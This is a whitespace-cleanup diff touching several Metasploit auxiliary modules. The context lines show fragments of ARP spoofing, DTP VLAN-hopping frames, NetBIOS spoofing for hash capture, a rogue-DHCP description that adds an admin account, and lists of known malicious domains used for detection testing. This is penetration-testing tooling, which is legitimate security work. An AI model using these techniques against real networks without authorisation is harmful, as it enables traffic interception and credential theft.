@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
partition seen. The windows user will have the password p@SSw0rd!123456
|
||||
(in case of complexity requirements) and will be added to the administrators
|
||||
group.
|
||||
|
||||
|
||||
Note: the displayed IP address of a target is the address this DHCP server
|
||||
handed out, not the "normal" IP address the host uses.
|
||||
},
|
||||
|
|
|
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
else
|
||||
shosts_range.each{|shost| if is_ipv4? shost then @shosts.push shost end}
|
||||
end
|
||||
|
||||
|
||||
if datastore['BROADCAST']
|
||||
broadcast_spoof
|
||||
else
|
||||
|
@ -116,7 +116,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
if capture and @spoofing and not datastore['BROADCAST']
|
||||
print_status("RE-ARPing the victims...")
|
||||
3.times do
|
||||
3.times do
|
||||
@dsthosts_cache.keys.sort.each do |dhost|
|
||||
dmac = @dsthosts_cache[dhost]
|
||||
if datastore['BIDIRECTIONAL']
|
||||
|
@ -197,7 +197,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
@dsthosts_cache[reply.arp_saddr_ip] = reply.arp_saddr_mac
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
#Wait some few seconds for last packets
|
||||
etime = Time.now.to_f + datastore['TIMEOUT']
|
||||
|
@ -221,7 +221,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if @dsthosts_cache.has_key? shost
|
||||
if datastore['VERBOSE']
|
||||
print_status("Adding #{shost} from destination cache")
|
||||
end
|
||||
end
|
||||
@srchosts_cache[shost] = @dsthosts_cache[shost]
|
||||
next
|
||||
end
|
||||
|
@ -269,7 +269,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
@spoofing = true
|
||||
while(true)
|
||||
if datastore['AUTO_ADD']
|
||||
@mutex_cache.lock
|
||||
@mutex_cache.lock
|
||||
if @dsthosts_autoadd_cache.length > 0
|
||||
@dsthosts_cache.merge!(@dsthosts_autoadd_cache)
|
||||
@dsthosts_autoadd_cache = {}
|
||||
|
@ -366,7 +366,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
return unless pkt.arp_opcode == 2
|
||||
pkt
|
||||
end
|
||||
|
||||
|
||||
def start_listener(dsthosts_cache, srchosts_cache)
|
||||
|
||||
if datastore['BIDIRECTIONAL']
|
||||
|
@ -386,8 +386,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
else
|
||||
args[:shosts].each {|address| liste_src_ips.push address}
|
||||
end
|
||||
liste_dst_ips = []
|
||||
args[:dhosts].each_key {|address| liste_dst_ips.push address}
|
||||
liste_dst_ips = []
|
||||
args[:dhosts].each_key {|address| liste_dst_ips.push address}
|
||||
localip = args[:localip]
|
||||
|
||||
listener_capture = ::Pcap.open_live(@interface, 68, true, 0)
|
||||
|
@ -419,7 +419,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
@srchosts_autoadd_cache[pkt.arp_saddr_ip] = pkt.arp_saddr_mac
|
||||
liste_src_ips.push pkt.arp_saddr_ip
|
||||
@mutex_cache.unlock
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
], self.class)
|
||||
deregister_options('RHOST', 'PCAPFILE')
|
||||
end
|
||||
|
||||
|
||||
def build_dtp_frame
|
||||
p = PacketFu::EthPacket.new
|
||||
p.eth_daddr = '01:00:0c:cc:cc:cc'
|
||||
|
@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
p.payload = llc_hdr << dtp_hdr
|
||||
p
|
||||
end
|
||||
|
||||
|
||||
def is_mac?(mac)
|
||||
!!(mac =~ /^([a-fA-F0-9]{2}:){5}[a-fA-F0-9]{2}$/)
|
||||
end
|
||||
|
@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
return @spoof_mac
|
||||
end
|
||||
|
||||
def run
|
||||
def run
|
||||
unless smac()
|
||||
print_error 'Source MAC (SMAC) should be defined'
|
||||
else
|
||||
|
|
|
@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
machine to an IP of the attacker's choosing. Combined with auxiliary/capture/server/smb or
|
||||
capture/server/http_ntlm it is a highly effective means of collecting crackable hashes on
|
||||
common networks.
|
||||
|
||||
|
||||
This module must be run as root and will bind to tcp/137 on all interfaces.
|
||||
},
|
||||
'Author' => [ 'Tim Medin <tim@securitywhole.com>' ],
|
||||
|
|
|
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
deregister_options('SNAPLEN','FILTER','PCAPFILE','RHOST','TIMEOUT','UDP_SECRET','GATEWAY','NETMASK')
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
check_pcaprub_loaded # Check first
|
||||
pkt_delay = datastore['PKT_DELAY']
|
||||
|
|
|
@ -60,7 +60,7 @@ COMMIT;
|
|||
RETURN NULL;
|
||||
END;
|
||||
"
|
||||
|
||||
|
||||
#PROCEDURE CREATE_CHANGE_SET
|
||||
# Argument Name Type In/Out Default?
|
||||
# ------------------------------ ----------------------- ------ --------
|
||||
|
|
|
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def run
|
||||
@res = Net::DNS::Resolver.new()
|
||||
|
||||
|
||||
domain = [
|
||||
"lalundelau.sinip.es","bf2back.sinip.es","thejacksonfive.mobi",
|
||||
"thejacksonfive.us","thejacksonfive.biz","butterfly.BigMoney.biz",
|
||||
|
@ -49,15 +49,15 @@ class Metasploit3 < Msf::Auxiliary
|
|||
"tamiflux.net","binaryfeed.in","youare.sexidude.com",
|
||||
"mierda.notengodominio.com",
|
||||
]
|
||||
|
||||
|
||||
if datastore['DNS_SERVER']
|
||||
@res.nameservers = datastore['DNS_SERVER']
|
||||
end
|
||||
|
||||
|
||||
count = 0
|
||||
|
||||
|
||||
while count < datastore['COUNT']
|
||||
|
||||
|
||||
domain.each do |name|
|
||||
query = @res.query(name, "A")
|
||||
time = Time.new
|
||||
|
|
|
@ -38,11 +38,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if datastore['DNS_SERVER']
|
||||
@res.nameservers = datastore['DNS_SERVER']
|
||||
end
|
||||
|
||||
|
||||
count = 0
|
||||
|
||||
|
||||
while count < datastore['COUNT']
|
||||
|
||||
|
||||
domain = datastore['DOMAINS'].split(/[\s,]+/)
|
||||
domain.each do |name|
|
||||
query = @res.query(name, "A")
|
||||
|
|
|
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def run
|
||||
@res = Net::DNS::Resolver.new()
|
||||
|
||||
|
||||
domain = [
|
||||
"allspring.net","antifoher.biz","asdfasdgqghgsw.cx.cc",
|
||||
"ashnmjjpoljfnl.info","atlaz.net","b3l.org","back.boroborogold.ru",
|
||||
|
@ -54,15 +54,15 @@ class Metasploit3 < Msf::Auxiliary
|
|||
"favoritopilodjd.com","favqnornkwvkwfxv.biz","fdhjkfhskas.com",
|
||||
"federalreserve-report.com","federetoktyt.net"
|
||||
]
|
||||
|
||||
|
||||
if datastore['DNS_SERVER']
|
||||
@res.nameservers = datastore['DNS_SERVER']
|
||||
end
|
||||
|
||||
|
||||
count = 0
|
||||
|
||||
|
||||
while count < datastore['COUNT']
|
||||
|
||||
|
||||
domain.each do |name|
|
||||
query = @res.query(name, "A")
|
||||
time = Time.new
|
||||
|
|
|
@ -12,13 +12,13 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
#
|
||||
# This module acts as an compromised webserver distributing PII Data
|
||||
#
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Auxiliary::PII
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'VSploit Web PII',
|
||||
|
|